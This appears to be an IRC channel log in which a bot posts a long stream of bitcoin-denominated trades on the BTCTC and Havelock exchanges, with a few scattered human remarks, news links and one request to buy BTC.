[LABCOIN] 2525 @ 0.00176 = 4.444 BTC [+] Aug 12 23:10:13 [BTCTC] [LABCOIN] 3 @ 0.001762 = 0.0053 BTC [+] Aug 12 23:10:21 [BTCTC] [DMS.PURCHASE] 50 @ 0.02801 = 1.4005 BTC [-] Aug 12 23:10:37 [BTCTC] [DMS.MINING] 13 @ 0.003502 = 0.0455 BTC [+] Aug 12 23:10:39 [BTCTC] [LABCOIN] 30 @ 0.00176 = 0.0528 BTC [-] Aug 12 23:10:39 [BTCTC] [LABCOIN] 3 @ 0.001761 = 0.0053 BTC [+] Aug 12 23:10:41 [BTCTC] [LABCOIN] 107 @ 0.001763 = 0.1886 BTC [+] Aug 12 23:10:42 unlikely Aug 12 23:10:42 [BTCTC] [DMS.SELLING] 13 @ 0.0251 = 0.3263 BTC [-] Aug 12 23:10:44 no, s.mpoe climbs 2 weeks already Aug 12 23:10:44 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 23:10:52 [BTCTC] [DMS.MINING] 20 @ 0.003502 = 0.07 BTC [+] Aug 12 23:11:16 [BTCTC] [LABCOIN] 30 @ 0.001717 = 0.0515 BTC [-] Aug 12 23:11:31 aww, my trolling. Aug 12 23:11:50 http://news.yahoo.com/20-bystanders-shot-bbs-during-lg-g2-promotion-152551994.html Aug 12 23:11:54 [BTCTC] [DMS.SELLING] 20 @ 0.0251 = 0.502 BTC [-] Aug 12 23:12:01 20 bystanders shot with BBs during LG G2 promotion gone wrong - Yahoo News Aug 12 23:12:02 don't shot the balloons Aug 12 23:12:32 [BTCTC] [LABCOIN] 30 @ 0.001717 = 0.0515 BTC [-] Aug 12 23:12:51 [BTCTC] [LABCOIN] 30 @ 0.001717 = 0.0515 BTC [-] Aug 12 23:12:52 http://www.uofmhealth.org/news/archive/201308/electrical-signatures-consciousness-dying-brain Aug 12 23:12:56 Electrical signatures of consciousness in the dying brain | University of Michigan Health System Aug 12 23:13:00 Any canadian in here in need of a large supply of BTC to purchase? Not having much luck with OTC. Aug 12 23:13:01 [BTCTC] [DMS.MINING] 13 @ 0.003502 = 0.0455 BTC [+] Aug 12 23:13:12 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 23:13:14 [BTCTC] [DMS.PURCHASE] 25 @ 0.02801 = 0.7003 BTC [-] Aug 12 23:13:22 [BTCTC] [LABCOIN] 30 @ 0.001717 = 0.0515 BTC [-] Aug 12 23:14:13 [BTCTC] [LABCOIN] 30 @ 0.001717 = 0.0515 BTC [-] Aug 12 23:14:29 [BTCTC] [DMS.MINING] 25 @ 0.003502 = 0.0876 BTC [+] Aug 12 23:14:43 [BTCTC] [DMS.MINING] 1 @ 0.003502 BTC [+] Aug 12 23:14:44 [BTCTC] [DMS.PURCHASE] 50 @ 0.02801 = 1.4005 BTC [-] Aug 12 23:14:46 [BTCTC] [DMS.PURCHASE] 1 @ 0.02801 BTC [-] Aug 12 23:15:04 [BTCTC] [DMS.MINING] 25 @ 0.003502 = 0.0876 BTC [+] Aug 12 23:15:33 [BTCTC] [DMS.PURCHASE] 25 @ 0.02801 = 0.7003 BTC [-] Aug 12 23:16:36 [BTCTC] [DMS.MINING] 25 @ 0.003502 = 0.0876 BTC [+] Aug 12 23:17:55 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Aug 12 23:18:05 [BTCTC] [LABCOIN] 5 @ 0.001754 = 0.0088 BTC [+] Aug 12 23:18:39 [BTCTC] [ACTIVEMINING] 30 @ 0.005811 = 0.1743 BTC [-] Aug 12 23:18:41 [BTCTC] [ACTIVEMINING] 100 @ 0.00581 = 0.581 BTC [-] Aug 12 23:19:46 [BTCTC] [ACTIVEMINING] 12 @ 0.005888 = 0.0707 BTC [+] Aug 12 23:22:00 [BTCTC] [DMS.MINING] 25 @ 0.003509 = 0.0877 BTC [+] Aug 12 23:22:57 [BTCTC] [LABCOIN] 2 @ 0.00175 = 0.0035 BTC [-] Aug 12 23:22:59 [BTCTC] [LABCOIN] 20 @ 0.001751 = 0.035 BTC [+] Aug 12 23:23:00 [BTCTC] [LABCOIN] 3 @ 0.00176 = 0.0053 BTC [+] Aug 12 23:23:01 [BTCTC] [LABCOIN] 30 @ 0.001761 = 0.0528 BTC [+] Aug 12 23:23:02 [BTCTC] [LABCOIN] 578 @ 0.001763 = 1.019 BTC [+] Aug 12 23:23:34 [BTCTC] [LABCOIN] 35 @ 0.001764 = 0.0617 BTC [+] Aug 12 23:23:46 [BTCTC] [DMS.MINING] 50 @ 0.00351 = 0.1755 BTC [+] Aug 12 23:24:21 [BTCTC] [LABCOIN] 1 @ 0.001763 BTC [-] Aug 12 23:24:48 [BTCTC] [LABCOIN] 30 @ 0.001762 = 0.0529 BTC [-] Aug 12 23:24:49 [BTCTC] [LABCOIN] 543 @ 0.001763 = 0.9573 BTC [+] Aug 12 23:26:22 [BTCTC] [DMS.PURCHASE] 50 @ 0.02801 = 1.4005 BTC [-] Aug 12 23:26:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0418 BTC [-] Aug 12 23:26:59 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [+] Aug 12 23:29:18 [BTCTC] [LABCOIN] 30 @ 0.001758 = 0.0527 BTC [-] Aug 12 23:29:19 [BTCTC] [LABCOIN] 12 @ 0.001759 = 0.0211 BTC [+] Aug 12 23:29:20 [BTCTC] [LABCOIN] 100 @ 0.00176 = 0.176 BTC [+] Aug 12 23:29:20 [BTCTC] [LABCOIN] 482 @ 0.001761 = 0.8488 BTC [+] Aug 12 23:29:46 [HAVELOCK] [SMG] 2 @ 0.000208 = 0.0004 BTC [+] Aug 12 23:31:10 [BTCTC] [ACTIVEMINING] 100 @ 0.005883 = 0.5883 BTC [-] Aug 12 23:31:12 [BTCTC] [ACTIVEMINING] 100 @ 0.005884 = 0.5884 BTC [+] Aug 12 23:31:13 [BTCTC] [ACTIVEMINING] 50 @ 0.005885 = 0.2943 BTC [+] Aug 12 23:33:51 [BTCTC] [ACTIVEMINING] 15 @ 0.005881 = 0.0882 BTC [-] Aug 12 23:33:53 [BTCTC] [ACTIVEMINING] 64 @ 0.005882 = 0.3764 BTC [+] Aug 12 23:33:54 [BTCTC] [ACTIVEMINING] 50 @ 0.005885 = 0.2943 BTC [+] Aug 12 23:33:55 [BTCTC] [ACTIVEMINING] 36 @ 0.005886 = 0.2119 BTC [+] Aug 12 23:34:46 [BTCTC] [LABCOIN] 7 @ 0.001754 = 0.0123 BTC [-] Aug 12 23:34:47 [BTCTC] [LABCOIN] 60 @ 0.001755 = 0.1053 BTC [+] Aug 12 23:34:48 [BTCTC] [LABCOIN] 240 @ 0.001761 = 0.4226 BTC [+] Aug 12 23:34:49 [BTCTC] [LABCOIN] 50 @ 0.001762 = 0.0881 BTC [+] Aug 12 23:34:50 [BTCTC] [LABCOIN] 43 @ 0.001762 = 0.0758 BTC [+] Aug 12 23:35:29 [BTCTC] [LABCOIN] 20 @ 0.001735 = 0.0347 BTC [-] Aug 12 23:35:31 [BTCTC] [LABCOIN] 49 @ 0.001734 = 0.085 BTC [-] Aug 12 23:35:33 [BTCTC] [LABCOIN] 272 @ 0.00173 = 0.4706 BTC [-] Aug 12 23:35:35 [BTCTC] [LABCOIN] 54 @ 0.001762 = 0.0951 BTC [+] Aug 12 23:38:24 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00145 = 0.0029 BTC [-] Aug 12 23:39:30 [BTCTC] [LABCOIN] 30 @ 0.001717 = 0.0515 BTC [-] Aug 12 23:40:11 [BTCTC] [LABCOIN] 68 @ 0.001717 = 0.1168 BTC [-] Aug 12 23:42:54 [BTCTC] [LABCOIN] 20 @ 0.001719 = 0.0344 BTC [+] Aug 12 23:42:56 [BTCTC] [LABCOIN] 362 @ 0.001717 = 0.6216 BTC [-] Aug 12 23:43:06 [BTCTC] [LABCOIN] 10 @ 0.001717 = 0.0172 BTC [-] Aug 12 23:43:42 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [+] Aug 12 23:44:09 [BTCTC] [LABCOIN] 70 @ 0.001715 = 0.1201 BTC [-] Aug 12 23:44:22 [BTCTC] [DMS.MINING] 50 @ 0.003536 = 0.1768 BTC [+] Aug 12 23:44:30 [BTCTC] [LABCOIN] 20 @ 0.00172 = 0.0344 BTC [+] Aug 12 23:44:31 [BTCTC] [LABCOIN] 20 @ 0.00172 = 0.0344 BTC [+] Aug 12 23:44:33 [BTCTC] [LABCOIN] 100 @ 0.00173 = 0.173 BTC [+] Aug 12 23:44:34 [BTCTC] [LABCOIN] 20 @ 0.001738 = 0.0348 BTC [+] Aug 12 23:44:35 [BTCTC] [LABCOIN] 100 @ 0.00174 = 0.174 BTC [+] Aug 12 23:44:36 [BTCTC] [LABCOIN] 60 @ 0.001756 = 0.1054 BTC [+] Aug 12 23:44:36 [BTCTC] [LABCOIN] 208 @ 0.001762 = 0.3665 BTC [+] Aug 12 23:44:37 [BTCTC] [LABCOIN] 100 @ 0.001762 = 0.1762 BTC [+] Aug 12 23:44:38 [BTCTC] [LABCOIN] 3870 @ 0.001763 = 6.8228 BTC [+] Aug 12 23:44:39 [BTCTC] [LABCOIN] 100 @ 0.00177 = 0.177 BTC [+] Aug 12 23:44:41 [BTCTC] [LABCOIN] 100 @ 0.00178 = 0.178 BTC [+] Aug 12 23:44:42 [BTCTC] [LABCOIN] 90 @ 0.001791 = 0.1612 BTC [+] Aug 12 23:44:43 [BTCTC] [LABCOIN] 100 @ 0.001797 = 0.1797 BTC [+] Aug 12 23:44:44 [BTCTC] [LABCOIN] 10000 @ 0.001798 = 17.98 BTC [+] Aug 12 23:44:45 [BTCTC] [LABCOIN] 1000 @ 0.001799 = 1.799 BTC [+] Aug 12 23:44:46 [BTCTC] [LABCOIN] 100 @ 0.001799 = 0.1799 BTC [+] Aug 12 23:44:47 [BTCTC] [LABCOIN] 1000 @ 0.001799 = 1.799 BTC [+] Aug 12 23:44:47 [BTCTC] [LABCOIN] 100 @ 0.001799 = 0.1799 BTC [+] Aug 12 23:44:48 [BTCTC] [LABCOIN] 13786 @ 0.0018 = 24.8148 BTC [+] Aug 12 23:44:50 uff Aug 12 23:44:51 [BTCTC] [LABCOIN] 30 @ 0.001761 = 0.0528 BTC [-] Aug 12 23:45:13 [BTCTC] [LABCOIN] 60 @ 0.001764 = 0.1058 BTC [+] Aug 12 23:46:12 [BTCTC] [ACTIVEMINING] 10 @ 0.00574 = 0.0574 BTC [-] Aug 12 23:47:16 [BTCTC] [TAT.ASICMINER] 40 @ 0.0417 = 1.668 BTC [-] Aug 12 23:48:28 [HAVELOCK] [SDSTM] 2 @ 0.0062618 = 0.0125 BTC [-] Aug 12 23:48:48 [HAVELOCK] [AM100] 2 @ 0.0387 = 0.0774 BTC [+] Aug 12 23:49:00 [HAVELOCK] [AM100] 2 @ 0.0387 = 0.0774 BTC [+] Aug 12 23:49:02 [HAVELOCK] [XBOND] 66 @ 0.00104699 = 0.0691 BTC [+] Aug 12 23:49:12 [HAVELOCK] [XBOND] 5 @ 0.00104699 = 0.0052 BTC [+] Aug 12 23:49:44 [BTCTC] [DMS.MINING] 24 @ 0.0037 = 0.0888 BTC [+] Aug 12 23:49:45 [BTCTC] [LABCOIN] 20 @ 0.001767 = 0.0353 BTC [+] Aug 12 23:49:46 [BTCTC] [DMS.MINING] 3 @ 0.0037 = 0.0111 BTC [+] Aug 12 23:49:47 [BTCTC] [LABCOIN] 230 @ 0.001766 = 0.4062 BTC [-] Aug 12 23:49:48 [BTCTC] [ACTIVEMINING] 30 @ 0.005742 = 0.1723 BTC [+] Aug 12 23:49:49 [HAVELOCK] [LABCO] 10 @ 0.00157 = 0.0157 BTC [+] Aug 12 23:49:52 [BTCTC] [ACTIVEMINING] 50 @ 0.005741 = 0.2871 BTC [-] Aug 12 23:49:53 [BTCTC] [LABCOIN] 50 @ 0.001765 = 0.0883 BTC [-] Aug 12 23:49:54 [BTCTC] [LABCOIN] 224 @ 0.001764 = 0.3951 BTC [-] Aug 12 23:49:55 [BTCTC] [ACTIVEMINING] 15 @ 0.00574 = 0.0861 BTC [-] Aug 12 23:49:55 [BTCTC] [ACTIVEMINING] 10 @ 0.005725 = 0.0573 BTC [-] Aug 12 23:49:56 [BTCTC] [ACTIVEMINING] 595 @ 0.00571 = 3.3975 BTC [-] Aug 12 23:49:58 [BTCTC] [LABCOIN] 4998 @ 0.001764 = 8.8165 BTC [-] Aug 12 23:49:59 [HAVELOCK] [SMG] 4 @ 0.000208 = 0.0008 BTC [+] Aug 12 23:50:32 [BTCTC] [DMS.MINING] 1 @ 0.0037 BTC [+] Aug 12 23:50:43 [HAVELOCK] [SMG] 4 @ 0.000208 = 0.0008 BTC [+] Aug 12 23:50:56 [BTCTC] [LABCOIN] 30 @ 0.001785 = 0.0536 BTC [+] Aug 12 23:50:57 [BTCTC] [LABCOIN] 20 @ 0.001786 = 0.0357 BTC [+] Aug 12 23:50:59 [BTCTC] [LABCOIN] 50 @ 0.001788 = 0.0894 BTC [+] Aug 12 23:51:00 [BTCTC] [LABCOIN] 1000 @ 0.00179 = 1.79 BTC [+] Aug 12 23:51:00 [BTCTC] [LABCOIN] 2731 @ 0.001798 = 4.9103 BTC [+] Aug 12 23:51:01 [BTCTC] [LABCOIN] 100 @ 0.001799 = 0.1799 BTC [+] Aug 12 23:51:02 [BTCTC] [LABCOIN] 1000 @ 0.001799 = 1.799 BTC [+] Aug 12 23:51:03 [BTCTC] [LABCOIN] 4069 @ 0.0018 = 7.3242 BTC [+] Aug 12 23:51:14 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001301 = 0.0026 BTC [-] Aug 12 23:51:37 [HAVELOCK] [SDSTM] 5 @ 0.0056358 = 0.0282 BTC [-] Aug 12 23:51:46 [BTCTC] [DMS.SELLING] 18 @ 0.02498 = 0.4496 BTC [-] Aug 12 23:51:47 [BTCTC] [DMS.SELLING] 25 @ 0.02499 = 0.6248 BTC [+] Aug 12 23:51:49 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 12 23:51:59 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [+] Aug 12 23:52:27 [HAVELOCK] [XBOND] 10 @ 0.00104699 = 0.0105 BTC [+] Aug 12 23:52:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.0418 = 0.1254 BTC [+] Aug 12 23:52:42 [BTCTC] [ACTIVEMINING] 30 @ 0.005711 = 0.1713 BTC [+] Aug 12 23:53:15 [BTCTC] [DMS.SELLING] 25 @ 0.0252 = 0.63 BTC [+] Aug 12 23:53:16 [BTCTC] [BTC-BOND] 2129 @ 0.0099 = 21.0771 BTC [-] Aug 12 23:53:19 [BTCTC] [BTC-BOND] 50 @ 0.009801 = 0.4901 BTC [-] Aug 12 23:53:20 [BTCTC] [BTC-BOND] 1 @ 0.0098 BTC [-] Aug 12 23:53:22 [BTCTC] [BTC-BOND] 50 @ 0.0097 = 0.485 BTC [-] Aug 12 23:53:23 [BTCTC] [BTC-BOND] 936 @ 0.009611 = 8.9959 BTC [-] Aug 12 23:53:26 [BTCTC] [DMS.MINING] 6 @ 0.0037 = 0.0222 BTC [+] Aug 12 23:53:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0418 BTC [+] Aug 12 23:54:22 [BTCTC] [ACTIVEMINING] 150 @ 0.00571 = 0.8565 BTC [-] Aug 12 23:54:30 [BTCTC] [LABCOIN] 30 @ 0.001775 = 0.0533 BTC [-] Aug 12 23:54:31 [BTCTC] [LABCOIN] 20 @ 0.001776 = 0.0355 BTC [+] Aug 12 23:54:32 [BTCTC] [LABCOIN] 40 @ 0.001778 = 0.0711 BTC [+] Aug 12 23:54:34 [BTCTC] [LABCOIN] 910 @ 0.0018 = 1.638 BTC [+] Aug 12 23:54:49 [BTCTC] [DMS.PURCHASE] 50 @ 0.02801 = 1.4005 BTC [-] Aug 12 23:55:02 [BTCTC] [DMS.PURCHASE] 50 @ 0.02801 = 1.4005 BTC [-] Aug 12 23:55:09 [BTCTC] [DMS.SELLING] 1 @ 0.025 BTC [-] Aug 12 23:55:10 [BTCTC] [LABCOIN] 25 @ 0.001725 = 0.0431 BTC [-] Aug 12 23:55:12 [BTCTC] [DMS.PURCHASE] 1 @ 0.02801 BTC [-] Aug 12 23:55:25 [BTCTC] [DMS.MINING] 1 @ 0.00368 BTC [-] Aug 12 23:56:11 [BTCTC] [DMS.SELLING] 50 @ 0.025 = 1.25 BTC [-] Aug 12 23:56:14 [BTCTC] [DMS.PURCHASE] 50 @ 0.02801 = 1.4005 BTC [-] Aug 12 23:56:19 [HAVELOCK] [AM1] 2 @ 3.9 = 7.8 BTC [-] Aug 12 23:57:36 [HAVELOCK] [XBOND] 7 @ 0.00104699 = 0.0073 BTC [+] Aug 12 23:57:44 [BTCTC] [LABCOIN] 30 @ 0.001799 = 0.054 BTC [+] Aug 12 23:57:47 [BTCTC] [KENILWORTH] 5 @ 0.001779 = 0.0089 BTC [-] Aug 12 23:57:48 [BTCTC] [DMS.SELLING] 13 @ 0.025 = 0.325 BTC [-] Aug 12 23:57:53 [BTCTC] [LABCOIN] 70 @ 0.001799 = 0.1259 BTC [+] Aug 12 23:57:54 [BTCTC] [DMS.MINING] 50 @ 0.0036 = 0.18 BTC [-] Aug 12 23:57:58 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 23:58:05 [HAVELOCK] [XBOND] 3 @ 0.00104699 = 0.0031 BTC [+] Aug 12 23:58:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.0418 BTC [+] Aug 12 23:58:49 [BTCTC] [DMS.MINING] 25 @ 0.003537 = 0.0884 BTC [-] Aug 12 23:58:59 [BTCTC] [DMS.SELLING] 63 @ 0.025 = 1.575 BTC [-] Aug 12 23:59:09 [BTCTC] [DMS.PURCHASE] 63 @ 0.02801 = 1.7646 BTC [-] Aug 12 23:59:34 [BTCTC] [KENILWORTH] 39 @ 0.00178 = 0.0694 BTC [+] Aug 13 00:00:08 [BTCTC] [DMS.PURCHASE] 200 @ 0.02801 = 5.602 BTC [-] Aug 13 00:00:40 [BTCTC] [DMS.MINING] 63 @ 0.003537 = 0.2228 BTC [-] Aug 13 00:00:43 [BTCTC] [DMS.SELLING] 63 @ 0.025 = 1.575 BTC [-] Aug 13 00:00:45 [BTCTC] [DMS.PURCHASE] 63 @ 0.02801 = 1.7646 BTC [-] Aug 13 00:01:17 [BTCTC] [BASIC-MINING] 1 @ 0.3155 BTC [-] Aug 13 00:01:18 [BTCTC] [BASIC-MINING] 4 @ 0.3151 = 1.2604 BTC [-] Aug 13 00:01:19 [BTCTC] [BASIC-MINING] 20 @ 0.315 = 6.3 BTC [-] Aug 13 00:02:05 [BTCTC] [DMS.MINING] 8 @ 0.00358 = 0.0286 BTC [+] Aug 13 00:02:19 [BTCTC] [DMS.MINING] 63 @ 0.003537 = 0.2228 BTC [-] Aug 13 00:02:27 [BTCTC] [DMS.SELLING] 63 @ 0.025 = 1.575 BTC [-] Aug 13 00:02:43 [BTCTC] [DMS.PURCHASE] 63 @ 0.02801 = 1.7646 BTC [-] Aug 13 00:02:44 [BTCTC] [BASIC-MINING] 4 @ 0.3267 = 1.3068 BTC [+] Aug 13 00:02:45 [BTCTC] [KENILWORTH] 3475 @ 0.0018 = 6.255 BTC [+] Aug 13 00:02:58 [BTCTC] [DMS.SELLING] 50 @ 0.025 = 1.25 BTC [-] Aug 13 00:03:26 [BTCTC] [DMS.PURCHASE] 60 @ 0.02801 = 1.6806 BTC [-] Aug 13 00:04:06 [BTCTC] [ACTIVEMINING] 8 @ 0.005711 = 0.0457 BTC [+] Aug 13 00:04:09 [BTCTC] [DMS.PURCHASE] 50 @ 0.02801 = 1.4005 BTC [-] Aug 13 00:04:19 [BTCTC] [DMS.MINING] 55 @ 0.00358 = 0.1969 BTC [+] Aug 13 00:04:34 [BTCTC] [DMS.MINING] 15 @ 0.00358 = 0.0537 BTC [+] Aug 13 00:04:36 [BTCTC] [DMS.MINING] 48 @ 0.003537 = 0.1698 BTC [-] Aug 13 00:04:45 [BTCTC] [DMS.SELLING] 63 @ 0.025 = 1.575 BTC [-] Aug 13 00:04:58 [BTCTC] [DMS.PURCHASE] 63 @ 0.02801 = 1.7646 BTC [-] Aug 13 00:05:43 [BTCTC] [DMS.SELLING] 50 @ 0.025 = 1.25 BTC [-] Aug 13 00:06:29 [BTCTC] [DMS.MINING] 63 @ 0.003537 = 0.2228 BTC [-] Aug 13 00:06:38 [BTCTC] [DMS.SELLING] 63 @ 0.025 = 1.575 BTC [-] Aug 13 00:06:40 [BTCTC] [DMS.PURCHASE] 63 @ 0.02801 = 1.7646 BTC [-] Aug 13 00:07:06 [BTCTC] [DMS.MINING] 60 @ 0.003537 = 0.2122 BTC [-] Aug 13 00:07:29 [BTCTC] [DMS.SELLING] 60 @ 0.025 = 1.5 BTC [-] Aug 13 00:07:55 [BTCTC] [DMS.SELLING] 186 @ 0.025 = 4.65 BTC [-] Aug 13 00:08:43 [HAVELOCK] [AM100] 10 @ 0.0386 = 0.386 BTC [-] Aug 13 00:09:07 [BTCTC] [DMS.PURCHASE] 220 @ 0.02801 = 6.1622 BTC [-] Aug 13 00:09:26 [BTCTC] [DMS.MINING] 63 @ 0.003537 = 0.2228 BTC [-] Aug 13 00:09:27 [BTCTC] [LABCOIN] 1 @ 0.001748 BTC [-] Aug 13 00:09:29 [BTCTC] [DMS.SELLING] 63 @ 0.025 = 1.575 BTC [-] Aug 13 00:09:31 [BTCTC] [DMS.MINING] 50 @ 0.003537 = 0.1769 BTC [-] Aug 13 00:09:38 [BTCTC] [DMS.PURCHASE] 63 @ 0.02801 = 1.7646 BTC [-] Aug 13 00:10:17 [BTCTC] [LABCOIN] 30 @ 0.001748 = 0.0524 BTC [-] Aug 13 00:10:41 [BTCTC] [DMS.MINING] 63 @ 0.003537 = 0.2228 BTC [-] Aug 13 00:10:41 [BTCTC] [DMS.SELLING] 350 @ 0.025 = 8.75 BTC [-] Aug 13 00:10:51 [BTCTC] [DMS.SELLING] 63 @ 0.025 = 1.575 BTC [-] Aug 13 00:11:17 [BTCTC] [LABCOIN] 30 @ 0.001748 = 0.0524 BTC [-] Aug 13 00:11:20 [BTCTC] [DMS.SELLING] 50 @ 0.025 = 1.25 BTC [-] Aug 13 00:11:47 [HAVELOCK] [AM100] 20 @ 0.0386 = 0.772 BTC [-] Aug 13 00:12:01 [BTCTC] [DMS.PURCHASE] 100 @ 0.02801 = 2.801 BTC [-] Aug 13 00:12:15 [BTCTC] [LABCOIN] 30 @ 0.001748 = 0.0524 BTC [-] Aug 13 00:12:36 [BTCTC] [DMS.PURCHASE] 7 @ 0.02801 = 0.1961 BTC [-] Aug 13 00:13:05 [BTCTC] [LABCOIN] 30 @ 0.001748 = 0.0524 BTC [-] Aug 13 00:13:38 [BTCTC] [DMS.MINING] 50 @ 0.003537 = 0.1769 BTC [-] Aug 13 00:14:08 [BTCTC] [DMS.PURCHASE] 60 @ 0.02801 = 1.6806 BTC [-] Aug 13 00:14:50 [BTCTC] [DMS.MINING] 13 @ 0.003537 = 0.046 BTC [-] Aug 13 00:15:01 [BTCTC] [LABCOIN] 50 @ 0.001751 = 0.0876 BTC [+] Aug 13 00:15:03 [BTCTC] [LABCOIN] 10 @ 0.00175 = 0.0175 BTC [-] Aug 13 00:15:20 [BTCTC] [DMS.SELLING] 227 @ 0.025 = 5.675 BTC [-] Aug 13 00:15:40 [BTCTC] [DMS.PURCHASE] 60 @ 0.02801 = 1.6806 BTC [-] Aug 13 00:15:43 [BTCTC] [DMS.MINING] 139 @ 0.003537 = 0.4916 BTC [-] Aug 13 00:15:45 [BTCTC] [DMS.MINING] 13 @ 0.003537 = 0.046 BTC [-] Aug 13 00:15:46 [BTCTC] [DMS.MINING] 55 @ 0.003536 = 0.1945 BTC [-] Aug 13 00:15:47 [BTCTC] [DMS.MINING] 20 @ 0.003535 = 0.0707 BTC [-] Aug 13 00:16:13 [BTCTC] [DMS.MINING] 35 @ 0.003535 = 0.1237 BTC [-] Aug 13 00:16:30 [BTCTC] [LABCOIN] 30 @ 0.001751 = 0.0525 BTC [+] Aug 13 00:16:31 [BTCTC] [LABCOIN] 20 @ 0.00175 = 0.035 BTC [-] Aug 13 00:16:32 [BTCTC] [LABCOIN] 30 @ 0.00175 = 0.0525 BTC [-] Aug 13 00:16:33 [BTCTC] [LABCOIN] 32 @ 0.00175 = 0.056 BTC [-] Aug 13 00:16:35 [BTCTC] [LABCOIN] 20 @ 0.001749 = 0.035 BTC [-] Aug 13 00:16:36 [BTCTC] [LABCOIN] 50 @ 0.001745 = 0.0873 BTC [-] Aug 13 00:16:37 [BTCTC] [LABCOIN] 62 @ 0.001736 = 0.1076 BTC [-] Aug 13 00:16:38 [BTCTC] [LABCOIN] 500 @ 0.001735 = 0.8675 BTC [-] Aug 13 00:16:39 [BTCTC] [LABCOIN] 61 @ 0.001731 = 0.1056 BTC [-] Aug 13 00:16:40 [BTCTC] [DMS.SELLING] 60 @ 0.025 = 1.5 BTC [-] Aug 13 00:16:41 [BTCTC] [LABCOIN] 488 @ 0.00173 = 0.8442 BTC [-] Aug 13 00:16:42 [BTCTC] [LABCOIN] 31 @ 0.001728 = 0.0536 BTC [-] Aug 13 00:16:43 [BTCTC] [LABCOIN] 100 @ 0.001727 = 0.1727 BTC [-] Aug 13 00:16:44 [BTCTC] [DMS.PURCHASE] 60 @ 0.02801 = 1.6806 BTC [-] Aug 13 00:16:45 [BTCTC] [LABCOIN] 127 @ 0.001726 = 0.2192 BTC [-] Aug 13 00:16:46 [BTCTC] [LABCOIN] 25 @ 0.001726 = 0.0432 BTC [-] Aug 13 00:16:47 [BTCTC] [LABCOIN] 18 @ 0.001724 = 0.031 BTC [-] Aug 13 00:16:48 [BTCTC] [LABCOIN] 50 @ 0.001723 = 0.0862 BTC [-] Aug 13 00:16:49 [BTCTC] [LABCOIN] 100 @ 0.001723 = 0.1723 BTC [-] Aug 13 00:16:50 [BTCTC] [LABCOIN] 77 @ 0.001722 = 0.1326 BTC [-] Aug 13 00:16:51 [BTCTC] [LABCOIN] 320 @ 0.001721 = 0.5507 BTC [-] Aug 13 00:16:52 [BTCTC] [LABCOIN] 300 @ 0.00172 = 0.516 BTC [-] Aug 13 00:16:52 [BTCTC] [LABCOIN] 93 @ 0.001719 = 0.1599 BTC [-] Aug 13 00:16:53 [BTCTC] [LABCOIN] 580 @ 0.001718 = 0.9964 BTC [-] Aug 13 00:16:54 [BTCTC] [LABCOIN] 170 @ 0.001717 = 0.2919 BTC [-] Aug 13 00:16:55 [BTCTC] [LABCOIN] 55 @ 0.001716 = 0.0944 BTC [-] Aug 13 00:16:56 [BTCTC] [LABCOIN] 440 @ 0.001715 = 0.7546 BTC [-] Aug 13 00:16:57 [BTCTC] [LABCOIN] 108 @ 0.001706 = 0.1842 BTC [-] Aug 13 00:16:58 [BTCTC] [LABCOIN] 6 @ 0.001705 = 0.0102 BTC [-] Aug 13 00:17:00 [BTCTC] [LABCOIN] 250 @ 0.001705 = 0.4263 BTC [-] Aug 13 00:17:01 [BTCTC] [LABCOIN] 614 @ 0.001704 = 1.0463 BTC [-] Aug 13 00:17:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.04175 = 0.0835 BTC [-] Aug 13 00:17:03 [BTCTC] [LABCOIN] 19 @ 0.001701 = 0.0323 BTC [-] Aug 13 00:17:03 [BTCTC] [DMS.PURCHASE] 230 @ 0.02801 = 6.4423 BTC [-] Aug 13 00:17:04 [BTCTC] [LABCOIN] 155 @ 0.0017 = 0.2635 BTC [-] Aug 13 00:17:05 [BTCTC] [LABCOIN] 204 @ 0.001681 = 0.3429 BTC [-] Aug 13 00:17:06 [BTCTC] [LABCOIN] 1100 @ 0.00168 = 1.848 BTC [-] Aug 13 00:17:07 [BTCTC] [LABCOIN] 30 @ 0.001791 = 0.0537 BTC [+] Aug 13 00:17:08 [BTCTC] [LABCOIN] 68 @ 0.001792 = 0.1219 BTC [+] Aug 13 00:17:10 [BTCTC] [LABCOIN] 412 @ 0.001793 = 0.7387 BTC [+] Aug 13 00:17:22 [BTCTC] [DMS.MINING] 60 @ 0.003503 = 0.2102 BTC [-] Aug 13 00:17:31 [BTCTC] [LABCOIN] 50 @ 0.00179 = 0.0895 BTC [-] Aug 13 00:17:46 [BTCTC] [DMS.MINING] 5 @ 0.003503 = 0.0175 BTC [-] Aug 13 00:18:04 [BTCTC] [DMS.MINING] 35 @ 0.003503 = 0.1226 BTC [-] Aug 13 00:18:05 [BTCTC] [DMS.MINING] 26 @ 0.0035 = 0.091 BTC [-] Aug 13 00:18:22 [BTCTC] [DMS.SELLING] 100 @ 0.025 = 2.5 BTC [-] Aug 13 00:18:24 [BTCTC] [LABCOIN] 30 @ 0.001787 = 0.0536 BTC [-] Aug 13 00:18:25 [BTCTC] [LABCOIN] 320 @ 0.001788 = 0.5722 BTC [+] Aug 13 00:18:35 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.001499 = 0.0105 BTC [+] Aug 13 00:18:43 [BTCTC] [DMS.MINING] 60 @ 0.0035 = 0.21 BTC [-] Aug 13 00:18:46 [BTCTC] [DMS.MINING] 60 @ 0.0035 = 0.21 BTC [-] Aug 13 00:18:47 [BTCTC] [LABCOIN] 30 @ 0.001753 = 0.0526 BTC [-] Aug 13 00:18:49 [BTCTC] [LABCOIN] 49 @ 0.001752 = 0.0858 BTC [-] Aug 13 00:18:50 [BTCTC] [DMS.SELLING] 60 @ 0.025 = 1.5 BTC [-] Aug 13 00:19:02 [BTCTC] [DMS.PURCHASE] 60 @ 0.02801 = 1.6806 BTC [-] 